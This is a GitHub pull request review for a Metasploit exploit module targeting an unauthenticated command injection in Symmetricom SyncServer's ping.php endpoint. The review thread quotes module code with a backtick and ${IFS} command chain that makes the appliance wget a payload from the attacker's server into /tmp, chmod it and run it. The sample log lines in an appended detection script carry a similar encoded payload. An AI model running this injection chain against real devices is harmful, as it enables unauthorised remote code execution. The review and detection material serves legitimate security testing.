Added symmetricom_syncserver_rce.rb #18077
Conversation
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
Hey @sdcampbell, thank you for the module! I mostly suggested changes to metadata and some nice-to-have items, but I understand you no longer have access to a vulnerable target.
include Msf::Exploit::EXE | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::Remote::HttpServer::HTML |
Adding AutoCheck gives the user the ability to automatically run the check method when exploiting.
include Msf::Exploit::EXE | |
include Msf::Exploit::Remote::HttpClient | |
include Msf::Exploit::Remote::HttpServer::HTML | |
include Msf::Exploit::EXE | |
include Msf::Exploit::Remote::HttpClient | |
include Msf::Exploit::Remote::HttpServer::HTML | |
prepend Msf::Exploit::Remote::AutoCheck |
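Review bot: prepending AutoCheck only works if the module's check returns an Exploit::CheckCode (Vulnerable, Safe, Unknown, ...) rather than a bare boolean, because the mixin gates the exploit on that value; the `def check` probing `/controller/ping.php` further down in this diff should be read with that in mind.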
register_options( | ||
[ | ||
OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']), | ||
OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']), | ||
OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444']) | ||
], self.class) |
I suggest adding the TARGETURI option in case the base path to the target is different for users of the module. With this option, you can use normalize_uri() to build the request uri.
register_options( | |
[ | |
OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']), | |
OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']), | |
OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444']) | |
], self.class) | |
register_options( | |
[ | |
OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']), | |
OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']), | |
OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444']), | |
OptString.new('TARGETURI', [ true, 'Base path to Symmetricom SyncServer', '/' ]) | |
]) |
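Review bot: the suggested block still re-registers SRVHOST and SRVPORT, which Msf::Exploit::Remote::HttpServer already provides; redefining SRVHOST with a 127.0.1.1 default replaces the mixin's bind-all default with a loopback address that a remote appliance cannot reach, and `OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444'])` passes the default as a string. Suggest dropping both redefinitions, or at least keeping the mixin's defaults and using an integer: `OptInt.new('SRVPORT', [true, 'HTTP Server Port', 4444])`. Dropping `self.class` from `register_options` is fine, since it is the default owner.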
end | ||
|
||
def check | ||
uri = '/controller/ping.php' |
uri = '/controller/ping.php' | |
uri = normalize_uri(target_uri.path, '/controller/ping.php') |
end | ||
|
||
def request(cmd) | ||
uri = "/controller/ping.php" |
uri = "/controller/ping.php" | |
uri = normalize_uri(target_uri.path, '/controller/ping.php') |
resource_uri="/"+filename | ||
shell_path = "/tmp/" | ||
cmds=["\`wget${IFS}http://"+srvhost+"/"+filename+"${IFS}-O${IFS}"+shell_path+filename+"\`", | ||
"\`chmod${IFS}700${IFS}"+shell_path+filename+"\`", | ||
"\`"+shell_path+filename+"\`"] | ||
start_service({'Uri' => { | ||
'Proc' => Proc.new { |cli, req| | ||
on_request_uri(cli, req)}, | ||
'Path' => resource_uri | ||
}}) |
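Review bot: in `cmds` the download URL is built from `srvhost` only, so the SRVPORT option registered above (default 4444) is never used and the server started by `start_service` is not the one the target is told to fetch from; the port needs to be part of that URL (e.g. `"http://" + srvhost + ":" + srvport.to_s + "/" + filename`). The hardcoded `shell_path = "/tmp/"` would also read better as an option, or at least a comment explaining why `/tmp` is assumed writable and executable on the appliance.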
This looks like a good use case for fetch payloads or a command stager, but I understand that may not be feasible since we can't test it.
Updated heading Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Fixed misspelling Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Added CVE Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Added link to CVE Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
I added the module documentation and accepted some of the proposed module code changes. Other suggestions which may affect the module working were not implemented simply because I no longer have access to the vulnerable system to test.
Added two commits which add the documentation and module output. Also includes formatting changes from Rubocop and some updates to the metadata. I just have one question about the srvport line. Didn't want to change that before verifying. Thanks!
Updated info to add allowed SRVPORT and LPORT, and fixed issue with srvport variable not used.
I fixed the issue with the srvport variable not used.
Thanks, verified the pcap. Will get this landed soon!
Release Notes
This adds an exploit for Symmetricom SyncServer appliances (S100-S300 series) vulnerable to an unauthenticated command injection in the
This change adds symmetricom_syncserver_rce.rb to modules/exploits/linux/http.
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/linux/http/symmetricom_syncserver_rce
This module exploits an unauthenticated command injection vulnerability in /controller/ping.php. The S100 through S350 (End of Life) models should be vulnerable to unauthenticated exploitation due to a session handling vulnerability. Later models require authentication which is not provided in this module because we can't test it. The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).
I have a packet capture and the output from HttpTrace which I will send to your email address.
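A defender-side check for the endpoint described in this PR, added here as an example that is not part of the module or of the PR: it scans web-server access-log lines for requests to /controller/ping.php whose query string carries shell-substitution characters such as the backticks and ${IFS} seen in the module's command chain. The log lines and the `host` parameter name are constructed for illustration; the PR does not name the injected parameter.

```ruby
require 'cgi'

# Constructed sample access-log lines (Combined Log Format). Hosts, timestamps
# and the 'host' query parameter are hypothetical; line 2 carries an encoded
# backtick/${IFS} payload of the shape the module sends, line 3 a plain POST.
SAMPLE_LOG = <<~LOG
  192.0.2.10 - - [10/Aug/2023:12:00:01 +0000] "GET /controller/ping.php?host=198.51.100.1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  192.0.2.44 - - [10/Aug/2023:12:00:02 +0000] "GET /controller/ping.php?host=198.51.100.1%60wget%24%7BIFS%7Dhttp%3A%2F%2F192.0.2.44%2Fpayload.elf%60 HTTP/1.1" 200 512 "-" "curl/7.88"
  192.0.2.44 - - [10/Aug/2023:12:00:03 +0000] "POST /controller/ping.php HTTP/1.1" 200 512 "-" "curl/7.88"
  192.0.2.10 - - [10/Aug/2023:12:00:04 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
LOG

# Minimal Combined Log Format parser: client IP, timestamp, method, target, status.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3})/
TARGET_PATH = '/controller/ping.php'.freeze
# Shell substitution and command separators that have no place in a ping target.
INJECTION_RE = /`|\$\(|\$\{IFS\}|\$IFS|[;|&\n]/

# Returns one hash per request to the ping endpoint whose URL-decoded query
# string contains injection metacharacters. POST bodies are not present in
# access logs, so a POST to the endpoint is only visible here as traffic from
# a source that is already flagged; correlate with request-body logging if any.
def suspicious_ping_requests(log_text)
  log_text.each_line.filter_map do |line|
    m = LOG_RE.match(line) or next
    path, _sep, query = m[:target].partition('?')
    next unless path == TARGET_PATH
    decoded = CGI.unescape(query) # undo %60, %24%7BIFS%7D and friends before matching
    next unless INJECTION_RE.match?(decoded)
    { ip: m[:ip], time: m[:time], method: m[:method], query: decoded }
  end
end

# Count flagged requests per source address, handy for a quick triage summary.
def offending_sources(log_text)
  suspicious_ping_requests(log_text).each_with_object(Hash.new(0)) { |hit, acc| acc[hit[:ip]] += 1 }
end

if __FILE__ == $PROGRAM_NAME
  suspicious_ping_requests(SAMPLE_LOG).each do |hit|
    puts "#{hit[:time]} #{hit[:ip]} #{hit[:method]} #{TARGET_PATH} query=#{hit[:query].inspect}"
  end
  puts offending_sources(SAMPLE_LOG).inspect
end
```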